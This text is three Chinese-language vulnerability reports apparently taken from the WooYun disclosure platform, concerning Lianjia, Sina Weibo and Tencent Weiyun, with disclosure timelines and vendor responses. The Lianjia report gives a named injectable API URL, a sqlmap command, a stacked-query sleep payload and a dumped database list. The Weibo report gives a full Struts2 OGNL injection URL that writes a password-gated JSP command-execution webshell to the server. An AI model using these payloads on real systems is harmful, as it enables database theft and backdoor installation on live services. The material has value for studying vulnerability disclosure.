漏洞详情披露状态： 2016-04-25： 细节已通知厂商并且等待厂商处理中2016-04-26： 厂商已经确认，细节仅向厂商公开2016-05-06： 细节向核心白帽子及相关领域专家公开2016-05-16： 细节向普通白帽子公开2016-05-26： 细节向实习白帽子公开2016-06-10： 细节向公众公开简要描述：链家网另一处SQL注入漏洞(主站数据库)，同类型的漏洞做码农真的好累，每天累死累活，还要被你们这些脚本菜鸟逼着补漏洞。详细说明：下面漏洞的延续，测试已经补丁好了WooYun: 链家网存在SQL注入漏洞(主站数据库/3300万用户) 新的注入点http://m.api.lianjia.com/web/ershoufang/sidebarchengjiao?callback=jQuery111104495485157240182_1460843660050&cityId=120000&id=120000&type=city&_=1460843660051API接口换个名字，一个同类型的漏洞PS： 这个接口的http://m.api.lianjia.com/house/ershoufang/detail?house_code=code&share_agent_ucid=*的share_agent_ucid 参数也存在GET parameter 'share_agent_ucid' seems to be 'MySQL > 5.0.11 stacked queries' injectable share_agent_ucid=1); SELECT SLEEP(5)--漏洞证明： code 区域python sqlmap.py -u "http://m.api.lianjia.com/web/ershoufang/sidebarchengjiao?callback=jQuery111104495485157240182_1460843660050&cityId=120000&id=120000&type=city&_=1460843660051" --dbscode 区域available databases [8]: [*] `session` [*] baichuan [*] hdic [*] information_schema [*] lianjia [*] salesmgmt [*] test [*] usermgr 修复方案：补补补版权声明：转载请注明来源 猪猪侠@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：10确认时间：2016-04-26 20:51厂商回复：第一处确认不存在注入，后补充的基于时间。感谢！最新状态：暂无

漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-27： 厂商已经确认，细节仅向厂商公开2016-05-07： 细节向核心白帽子及相关领域专家公开2016-05-17： 细节向普通白帽子公开2016-05-27： 细节向实习白帽子公开2016-06-11： 细节向公众公开简要描述：看到http://www.tangscan.com 上插件了，赶紧下一个测试一下。惊喜发现详细说明： 看到http://www.tangscan.com 上插件了，赶紧下一个测试一下code 区域https://rap.weibo.cn/account/mySetting.action?method:[email protected]/* */@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get%28%23a%29,%23b%3d%23req.getRealPath%28%23c%29%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream%28%23b%29,%23fos.write%28%23parameters.content[0].getBytes%28%29%29,%23fos.close%28%29,%23hh%3d%23context.get%28%23parameters.rpsobj[0]%29,%23hh.getWriter%28%29.println%28%23b%29,%23hh.getWriter%28%29.flush%28%29,%23hh.getWriter%28%29.close%28%29,1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%20java.io.InputStream%20in%20%253d%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%253d%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%253d%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%253din.read%28b%29%29%21%253d-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E 漏洞证明：  修复方案：升级版权声明：转载请注明来源 举起手来@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：8确认时间：2016-04-27 15:57厂商回复：感谢关注新浪安全，问题修复中。最新状态：暂无

漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-09： 厂商已经确认，细节仅向厂商公开2016-05-19： 细节向核心白帽子及相关领域专家公开2016-05-29： 细节向普通白帽子公开2016-06-08： 细节向实习白帽子公开2016-06-23： 细节向公众公开简要描述： 详细说明：腾讯微云远程命令执行执行命令结果漏洞证明：命令结果appadmin修复方案：你们懂的版权声明：转载请注明来源 pwnsh4d0w@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-05-09 12:45厂商回复：非常感谢您的报告，此问题我们已经第一时间紧急处理。感谢大家对腾讯业务安全的关注。如果您有任何疑问，欢迎反馈，最新状态：暂无